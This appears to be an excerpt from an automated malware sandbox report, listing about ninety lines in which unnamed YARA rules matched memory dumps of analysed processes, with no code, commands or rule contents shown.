Source: Yara matchFile source: 00000000.00000003.764961402.000000000268C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000003.1134083998.0000000002324000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.764636834.000000000264C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.768913926.000000000266C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000003.1138467432.0000000002380000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.760448315.0000000002664000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000003.1120682874.000000000238C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000003.1117167668.0000000002368000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000003.1115831278.0000000002338000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000003.1125989775.000000000230C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.788263058.00000000026E8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.782231487.00000000026D8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000003.1104391642.0000000002358000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.766234805.0000000002690000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000003.1141808468.00000000023B8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000003.1118981779.00000000023CC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000003.1135906676.00000000022FC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.766655884.0000000002690000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.760784387.0000000002668000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000003.1124931240.000000000230C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000003.1093042591.000000000234C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.789708240.000000000267C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.774173579.00000000026E8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.760966548.000000000264C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000003.1128728677.0000000002370000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.768672362.0000000002700000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000003.1099360498.000000000230C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.781896556.0000000002678000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000003.1085318410.0000000002370000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000003.1112329359.000000000235C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000003.1123341776.00000000022FC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000003.1112364723.000000000237C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000003.1099203153.000000000237C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.783990212.000000000270C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.766343360.00000000026AC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000003.1091998765.000000000230C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.763939108.000000000264C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.769211344.00000000026B4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.770468447.0000000002674000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000003.1083876704.0000000002368000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000003.1099538200.0000000002330000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000003.1091938192.0000000002390000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.762407045.00000000026E8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000003.1130143682.0000000002398000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.770692377.000000000264C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000003.1085491151.000000000236C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000003.1148600324.00000000022FC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000003.1132786247.0000000002354000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000003.1123127861.0000000002348000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000003.1141592015.0000000002388000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.764758224.0000000002668000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.765059225.00000000026AC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000003.1094266318.000000000232C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000003.1149701162.000000000232C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.771205396.000000000264C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.779489387.0000000002674000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000003.1119028912.000000000233C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.769558086.00000000026FC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000003.1114719226.00000000022FC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000003.1097140556.0000000002330000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000003.1084487465.00000000023C8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.772418203.00000000026E8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.761751534.000000000272C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.778443184.00000000026CC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.776446152.000000000264C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000003.1136975515.00000000022FC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000003.1129881050.0000000002370000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000003.1083361782.0000000002328000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000003.1108473013.000000000230C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000003.1114908181.0000000002318000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000003.1112850382.0000000002334000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000003.1089466237.000000000236C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000003.1107409714.000000000230C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000003.1106077923.000000000235C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000003.1095692557.000000000232C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000003.1083015932.00000000023CC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000003.1116131519.000000000236C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000003.1117921261.000000000230C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000003.1108082248.000000000238C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000003.1125197594.000000000233C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000003.1099768766.0000000002358000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000003.1129684261.0000000002348000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000003.1096385277.0000000002398000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.785577978.000000000264C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000003.1127900740.00000000023A4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000003.1104877406.00000000023A8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.767329960.0000000002668000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000003.1145836731.000000000232C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000003.1124077291.000000000233C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000003.1120414236.0000000002368000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000003.1083126597.00000000023EC000.00000004.00000001.sdmp, type: MEMORY